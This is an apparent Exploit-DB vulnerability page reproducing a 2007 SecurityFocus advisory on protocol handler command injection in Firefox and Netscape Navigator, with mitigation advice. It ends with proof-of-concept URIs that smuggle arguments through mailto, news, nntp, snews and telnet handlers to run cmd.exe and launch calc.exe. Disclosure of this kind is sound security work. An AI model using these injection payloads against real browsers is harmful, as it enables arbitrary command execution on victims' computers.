Multiple Browsers Protocol Handler Injection Vulnerability

vendor:

Firefox and Navigator

by:

SecurityFocus

7.5

CVSS

HIGH

Protocol Handler Injection

CWE

Product Name: Firefox and Navigator

Affected Version From: Mozilla Firefox 2.0.0.5, 3.0a6 and Netscape Navigator 9

Affected Version To: Mozilla Firefox 2.0.0.5, 3.0a6 and Netscape Navigator 9

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows

2007

Multiple Browsers Protocol Handler Injection Vulnerability

Multiple browsers are prone to vulnerabilities that let attackers inject commands through various protocol handlers. Exploiting these issues allows remote attackers to pass and execute arbitrary commands and arguments through processes such as 'cmd.exe' by employing various URI handlers. An attacker can exploit these issues to carry out various attacks by executing arbitrary commands on a vulnerable computer.

Mitigation:

Ensure that all user input is validated and filtered before being passed to the protocol handler. Additionally, ensure that the application is running with the least privileges necessary to perform its function.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/25053/info

Multiple browsers are prone to vulnerabilities that let attackers inject commands through various protocol handlers.

Exploiting these issues allows remote attackers to pass and execute arbitrary commands and arguments through processes such as 'cmd.exe' by employing various URI handlers.

An attacker can exploit these issues to carry out various attacks by executing arbitrary commands on a vulnerable computer.

Exploiting these issues would permit remote attackers to influence command options that can be called through protocol handlers and to execute commands with the privileges of a user running the application. Successful attacks may result in a variety of consequences, including remote unauthorized access.

Mozilla Firefox 2.0.0.5, 3.0a6 and Netscape Navigator 9 are reported vulnerable to these issues. Other versions of these browsers and other vendors' browsers may also be affected.

mailto:%00%00../../../../../../windows/system32/cmd".exe ../../../../../../../../windows/system32/calc.exe " - " blah.bat

nntp:windows/system32/calc.exe%20"%20-%20"%20blah.bat

news:windows/system32/calc.exe%20"%20-%20"%20blah.bat

snews:windows/system32/calc.exe%20"%20-%20"%20blah.bat

telnet:windows/system32/calc.exe%20"%20-%20"%20blah.bat

telnet:// rundll32.exe url.dll,TelnetProtocolHandler %l

news:// â??%ProgramFiles%\Outlook Express\msimn.exeâ? /newsurl:%1

nntp:// â??%ProgramFiles%\Outlook Express\msimn.exeâ? /newsurl:%1

snews:// â??%ProgramFiles%\Outlook Express\msimn.exeâ? /newsurl:%1

mailto:// C:\lotus\notes\notes.exe /defini %1